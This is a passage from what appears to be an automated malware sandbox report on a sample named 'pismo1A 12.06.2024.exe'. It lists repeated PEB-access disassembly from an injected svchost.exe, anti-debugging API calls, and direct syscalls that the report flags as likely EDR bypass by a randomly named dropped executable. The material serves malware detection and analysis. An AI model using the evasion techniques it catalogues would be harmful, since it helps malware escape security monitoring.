Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033364AB mov eax, dword ptr fs:[00000030h]	2_2_033364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EA49A mov eax, dword ptr fs:[00000030h]	2_2_033EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033304E5 mov ecx, dword ptr fs:[00000030h]	2_2_033304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]	2_2_0335EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]	2_2_0335EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]	2_2_033F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]	2_2_033F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]	2_2_03402B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]	2_2_03402B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]	2_2_03402B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03402B57 mov eax, dword ptr fs:[00000030h]	2_2_03402B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404B00 mov eax, dword ptr fs:[00000030h]	2_2_03404B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332CB7E mov eax, dword ptr fs:[00000030h]	2_2_0332CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328B50 mov eax, dword ptr fs:[00000030h]	2_2_03328B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DEB50 mov eax, dword ptr fs:[00000030h]	2_2_033DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]	2_2_033E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]	2_2_033E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]	2_2_033C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]	2_2_033C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FAB40 mov eax, dword ptr fs:[00000030h]	2_2_033FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D8B42 mov eax, dword ptr fs:[00000030h]	2_2_033D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]	2_2_03340BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]	2_2_03340BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_033E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_033E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]	2_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]	2_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]	2_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335EBFC mov eax, dword ptr fs:[00000030h]	2_2_0335EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_033BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_033DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]	2_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]	2_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]	2_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]	2_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]	2_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]	2_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]	2_2_03354A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]	2_2_03354A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336CA38 mov eax, dword ptr fs:[00000030h]	2_2_0336CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336CA24 mov eax, dword ptr fs:[00000030h]	2_2_0336CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335EA2E mov eax, dword ptr fs:[00000030h]	2_2_0335EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BCA11 mov eax, dword ptr fs:[00000030h]	2_2_033BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]	2_2_033ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]	2_2_033ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]	2_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]	2_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]	2_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DEA60 mov eax, dword ptr fs:[00000030h]	2_2_033DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h]	2_2_03340A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h]	2_2_03340A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h]	2_2_03338AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h]	2_2_03338AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03386AA4 mov eax, dword ptr fs:[00000030h]	2_2_03386AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03368A90 mov edx, dword ptr fs:[00000030h]	2_2_03368A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404A80 mov eax, dword ptr fs:[00000030h]	2_2_03404A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h]	2_2_0336AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h]	2_2_0336AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330AD0 mov eax, dword ptr fs:[00000030h]	2_2_03330AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h]	2_2_03364AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h]	2_2_03364AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]	2_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]	2_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]	2_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404940 mov eax, dword ptr fs:[00000030h]	2_2_03404940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B892A mov eax, dword ptr fs:[00000030h]	2_2_033B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C892B mov eax, dword ptr fs:[00000030h]	2_2_033C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BC912 mov eax, dword ptr fs:[00000030h]	2_2_033BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]	2_2_03328918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]	2_2_03328918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]	2_2_033AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]	2_2_033AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]	2_2_033D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]	2_2_033D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BC97C mov eax, dword ptr fs:[00000030h]	2_2_033BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]	2_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]	2_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]	2_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]	2_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337096E mov edx, dword ptr fs:[00000030h]	2_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]	2_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B0946 mov eax, dword ptr fs:[00000030h]	2_2_033B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B89B3 mov esi, dword ptr fs:[00000030h]	2_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]	2_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]	2_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]	2_2_033309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]	2_2_033309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]	2_2_033629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]	2_2_033629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_033BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033649D0 mov eax, dword ptr fs:[00000030h]	2_2_033649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_033FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C69C0 mov eax, dword ptr fs:[00000030h]	2_2_033C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov ecx, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A830 mov eax, dword ptr fs:[00000030h]	2_2_0336A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]	2_2_033D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]	2_2_033D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BC810 mov eax, dword ptr fs:[00000030h]	2_2_033BC810

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe

Code function: 0_2_00700B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00700B62

Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006D2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_006D2622
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006C083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_006C083F
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006C09D5 SetUnhandledExceptionFilter,	0_2_006C09D5
Source: C:\Users\user\Desktop\pismo1A 12.06.2024.exe	Code function: 0_2_006C0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_006C0C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtOpenSection: Direct from: 0x76EF2E0C	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtCreateFile: Direct from: 0x76EF2FEC	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtOpenFile: Direct from: 0x76EF2DCC	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtTerminateThread: Direct from: 0x76EF2FCC	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtCreateMutant: Direct from: 0x76EF35CC	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtResumeThread: Direct from: 0x76EF36AC	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtReadFile: Direct from: 0x76EF2ADC	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtDelayExecution: Direct from: 0x76EF2DDC	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtResumeThread: Direct from: 0x76EF2FBC	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtCreateUserProcess: Direct from: 0x76EF371C	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtSetInformationThread: Direct from: 0x76EE63F9	Jump to behavior
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\QvcsUyiwlrXbTYBprAVgVuHmVAqfSImRKfFqxSSflIIKkQwoZZMHEjgiSGyHBVgGZDKcM\IwDtIjtyhRCIk.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
